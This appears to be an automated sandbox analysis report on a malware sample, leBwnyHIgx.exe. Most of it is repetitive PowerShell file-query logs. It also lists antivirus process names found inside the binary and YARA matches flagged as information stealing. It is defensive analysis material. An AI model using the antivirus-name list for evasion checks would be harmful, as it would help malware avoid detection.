                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0061A76C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeW,GetLastError,CreateFileW,SetNamedPipeHandleState,CreateProcessW,CloseHandle,CloseHandle,0_2_0061A76C
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00601070 GetSystemTimeAsFileTime,FileTimeToSystemTime,0_2_00601070
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03085D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,5_2_03085D22
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_004270EC GetVersionExW,0_2_004270EC
                      Source: leBwnyHIgx.exeBinary or memory string: acs.exe
                      Source: leBwnyHIgx.exeBinary or memory string: vsserv.exe
                      Source: leBwnyHIgx.exeBinary or memory string: avcenter.exe
                      Source: leBwnyHIgx.exeBinary or memory string: kxetray.exe
                      Source: leBwnyHIgx.exeBinary or memory string: cfp.exe
                      Source: leBwnyHIgx.exeBinary or memory string: avp.exe
                      Source: leBwnyHIgx.exeBinary or memory string: KSafeTray.exe
                      Source: leBwnyHIgx.exeBinary or memory string: 360Safe.exe
                      Source: leBwnyHIgx.exeBinary or memory string: rtvscan.exe
                      Source: leBwnyHIgx.exeBinary or memory string: 360tray.exe
                      Source: leBwnyHIgx.exeBinary or memory string: ashDisp.exe
                      Source: leBwnyHIgx.exeBinary or memory string: TMBMSRV.exe
                      Source: leBwnyHIgx.exeBinary or memory string: 360Tray.exe
                      Source: leBwnyHIgx.exeBinary or memory string: avgwdsvc.exe
                      Source: leBwnyHIgx.exeBinary or memory string: AYAgent.aye
                      Source: leBwnyHIgx.exeBinary or memory string: QUHLPSVC.EXE
                      Source: leBwnyHIgx.exeBinary or memory string: RavMonD.exe
                      Source: leBwnyHIgx.exeBinary or memory string: Mcshield.exe
                      Source: leBwnyHIgx.exeBinary or memory string: K7TSecurity.exe

                      Stealing of Sensitive Information

Source: Yara match | File source: 5.2.leBwnyHIgx.exe.44e05eb.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.428486b.37.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.leBwnyHIgx.exe.4252c53.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.30.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.925ddb.25.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.leBwnyHIgx.exe.428486b.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.428486b.29.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.3fe80cb.28.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.428486b.31.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.428486b.24.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.leBwnyHIgx.exe.3070000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.leBwnyHIgx.exe.2ef05bf.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.leBwnyHIgx.exe.2df1053.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.32.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.13.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.23.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.428486b.34.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.3fe80cb.28.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.leBwnyHIgx.exe.428486b.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.13.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.32.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.leBwnyHIgx.exe.4511bf3.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.36.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.3fe80cb.35.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.33.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.leBwnyHIgx.exe.2df1053.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.428486b.21.unpack, type: UNPACKEDPE
